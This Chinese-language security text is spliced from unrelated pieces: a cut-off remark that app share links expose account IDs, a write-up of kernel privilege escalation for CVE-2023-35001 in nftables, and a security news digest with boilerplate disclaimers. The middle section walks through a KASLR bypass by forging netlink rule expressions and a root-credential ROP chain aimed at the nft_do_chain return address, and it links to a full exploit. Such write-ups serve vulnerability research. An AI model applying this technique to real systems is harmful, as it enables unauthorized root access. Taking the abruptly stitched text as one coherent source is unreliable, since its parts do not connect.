除了小红书以外，根据网站开发者的描述，日常中我们耳熟能详的、使用率极高的大部分APP，包括微博、网易云音乐、QQ音乐、全民K歌、喜马拉雅、雪球、Keep、汽水音乐、百度、小宇宙、知乎......等等，无一例外，都可能会透过分享链接轻松识别你的账号ID。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 本文将介绍如何绕过KASLR以及如何提权利用。 KASLR绕过 可以利用byteorder操作加上netlink组订阅可以泄露rule中的handle字段。该方法应该是可以用来泄露kernel基地址的，但是作者还提出另一种方法进行泄露。应该是为了提权利用做铺垫。 由于发现已经泄露的模块的基地址，因此可以利用模块地址伪造表达式。 作者找到了range表达式，用于伪造其余表达式。总大小为0x23。并且表达式是八字节对齐的，因此该结构体会占用0x28字节。 struct nft_range_expr { struct nft_data data_from; struct nft_data data_to; u8 sreg; u8 len; enum nft_range_ops op:8; }; 具体的布局如下 可以看到data_from与data_to都是从用户态中传递过去的数据，因此我们可以在这些区域内伪造表达式，这有点像在CTF中，我们泄露了堆块基址后，随意伪造堆块。 由于我们有0x28字节的空间，但是实际能够操作的空间是data_from与data_to两段，即0x20的空间大小。因此我们需要挑选小于0x20的规则表达式进行伪造，并且能够执行泄露功能的。 这里作者选用了byteorder表达式，可以看到该表达式在对齐后只占用八字节。 struct nft_byteorder { u8 sreg; u8 dreg; enum nft_byteorder_ops op:8; u8 len; u8 size; }; 构造后，可以发现还有八字节的data_to没有用，但是并不能直接丢弃不适用，因为在调用完byteorder操作后还需要继续执行其他规则表达式。 但是其他表达式都是需要大于0x8的，毕竟一个操作指针就占用八字节了，此时作者选用了meta表达式。可以看到meta表达式也只用到了三个字节，刚好对应range表达式的sreg、len以及op。 struct nft_meta { enum nft_meta_keys key:8; u8 len; union { u8 dreg; u8 sreg; }; }; meta表达式的操作如下，在meta表达式中meta->key执行具体的操作，如[1]，但是若该值是非法值则会执行[2]，可以看到该meta表达式仅会抛出异常，但是不会终止运行，这就说明即使meta->key是非法值也不会影响后续规则表达式的正常执行。 File: linux-5.19\net\netfilter\nft_meta.c 418: void nft_meta_set_eval(const struct nft_expr *expr, 419:       struct nft_regs *regs, 420:       const struct nft_pktinfo *pkt) 421: { 422: const struct nft_meta *meta = nft_expr_priv(expr); 423: struct sk_buff *skb = pkt->skb; 424: u32 *sreg = &regs->data[meta->sreg]; 425: u32 value = *sreg; 426: u8 value8; 427: 428: switch (meta->key) { ----> [1] 429: case NFT_META_MARK: 430: skb->mark = value; 431: break; 432: case NFT_META_PRIORITY: 433: skb->priority = value; 434: break; 435: case NFT_META_PKTTYPE: 436: value8 = nft_reg_load8(sreg); 437: 438: if (skb->pkt_type != value8 && 439:    skb_pkt_type_ok(value8) && 440:    skb_pkt_type_ok(skb->pkt_type)) 441: skb->pkt_type = value8; 442: break; 443: case NFT_META_NFTRACE: 444: value8 = nft_reg_load8(sreg); 445: 446: skb->nf_trace = !!value8; 447: break; 448: #ifdef CONFIG_NETWORK_SECMARK 449: case NFT_META_SECMARK: 450: skb->secmark = value; 451: break; 452: #endif 453: default: 454: WARN_ON(1); ---->[2] 455: } 456: } 因此第二个伪造的表达式也找到了，就是meta表达式。由于我们直接伪造了规则表达式，因此不会进行寄存器参数的校验，只要选择内核地址选择泄露即可。 这里简单说一下伪造的规则头，此时的len需要设置为0x20以及islast需要设置为0。 最后泄露的效果如下，即使内核已经抛出了异常，但是不会影响后续表达式的正常执行。 提权利用 既然可以随意伪造表达式，因此我们可以伪造payload表达式。 struct nft_payload { enum nft_payload_bases base:8; u8 offset; u8 len; u8 dreg; }; 在regs下方存在着nft_do_chain函数返回地址，因此可以直接通过payload表达式将提权payload注入进来。 由于我们可以伪造payload表达式，因此注入的payload长度不受限，因此采用 commit_creds(prepare_kernel_cred(0))，构造root凭证 接着利用find_task_by_vpid、init_nsproxy以及switch_task_namespaces切换命名空间。 最后利用蹦床swapgs_restore_regs_and_retrun_to_usermode返回到用户空间完成提权利用。 完整exp：https://github.com/h0pe-ay/Vulnerability-Reproduction/tree/master/CVE-2023-35001(nftables)

1、攻击者利用虚假电子商务网站传播恶意安卓应用 https://cyble.com/blog/elevating-the-stakes-the-enhanced-arsenal-of-the-fake-e-shop-campaign/ 2022年9月，研究人员注意到利用虚假电子商务网站的攻击活动大幅上升，该活动一直积极地针对马来西亚、越南和缅甸。该活动始于2021年，主要针对马来西亚的多家银行，后来其范围扩大至包括越南和缅甸的实体。研究人员最近发现此类相关网络钓鱼网站有所增加，并确定了10多个主动传播恶意APK的网站。最初，该活动分发的APK文件主要利用网络钓鱼技术以及SMS窃取程序来窃取用户凭据。但是，该恶意软件的最新版本已对功能进行升 2、研究人员在Hugging Face中发现安全漏洞 https://www.infosecurity-magazine.com/news/wiz-discovers-flaws-generative-ai Hugging Face是共享AI模型和应用程序的中心，研究人员在上传到Hugging Face的生成式AI模型中发现了两个关键的架构缺陷。在分析了上传到Hugging Face上的几个AI模型后，研究人员发现，其中一些模型正在共享推理基础设施。研究人员表示，推理基础设施经常运行不受信任的、潜在的恶意模型。研究人员还描述了攻击者可以采取一些方法来利用这两种风险，包括：使用导致模型产生错误预测的输入、使用输入生成在应用程序中不安全使用的正确预 3、勒索组织Hunters International声称攻击贝纳通集团 https://cybernews.com/news/benetton-group-claimed-by-hunters-international/ 据称，全球时尚公司贝纳通集团遭到勒索组织Hunters International的攻击，网络犯罪分子声称窃取了433GB的数据。根据该组织发布的暗网消息，包含33.8MB客户数据的10个文件将在1天16小时后披露，该组织暂未提供数据示例。目前该集团尚未确认此次事件。 4、微软修补了Azure Kubernetes服务容器中的漏洞 https://www.securityweek.com/microsoft-plugs-gaping-hole-in-azure-kubernetes-service-confidential-containers/ 星期二补丁：微软警告未经身份验证的黑客可以完全控制 Azure Kubernetes 集群。 5、超过9.1万台运行WEBOS的 LG智能电视易受到黑客攻击 https://securityaffairs.com/161651/hacking/lg-smart-tvs-vulnerable.html 研究人员在智能电视上运行的 LG webOS 中发现了多个漏洞，可能允许攻击者获得设备的 root 访问权限。 6、Google 宣布推出 V8 Sandbox 来保护 Chrome https://securityaffairs.com/161622/security/google-v8-sandbox.html 谷歌宣布在 Chrome 网络浏览器中支持 V8 沙箱，以保护用户免受触发内存损坏问题的攻击。 7、ScrubCrypt 使用大量插件部署 VenomRAT https://www.fortinet.com/blog/threat-research/scrubcrypt-deploys-venomrat-with-arsenal-of-plugins 网络安全研究人员发现了一种复杂的多阶段攻击，该攻击利用以发票为主题的网络钓鱼诱饵来传播各种恶意软件，例如 Venom RAT、Remcos RAT、XWorm、NanoCore RAT 以及针对加密钱包的窃取程序。 8、工信部发布关于防范利用xz-utils植入漏洞风险提示 https://www.secrss.com/articles/65023 近日，工业和信息化部网络安全威胁和漏洞信息共享平台（NVDB）监测发现，Linux压缩工具xz-utils存在恶意代码植入漏洞，可被恶意利用实施网络攻击。 9、越南黑客瞄准亚洲各地的金融数据 https://www.inforisktoday.com/vietnamese-threat-actor-targeting-financial-data-across-asia-a-24796 思科Talos的研究人员发现了一组黑客活动，黑客攻击印度，中国，韩国，孟加拉国，巴基斯坦，印度尼西亚和国内目标，并带有渗透恶意软件，其目的是收集公司证书和财务数据，以便在在线犯罪市场转售。 10、Hugging Face 与 Wiz 合作开发 AI 安全 https://cybernews.com/security/hugging-face-partners-with-wiz/#google_vignette 网络安全公司 Wiz 与 Hugging Face 合作，修补 AI 云提供商架构中的漏洞，这些漏洞可能使其客户数据面临风险。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。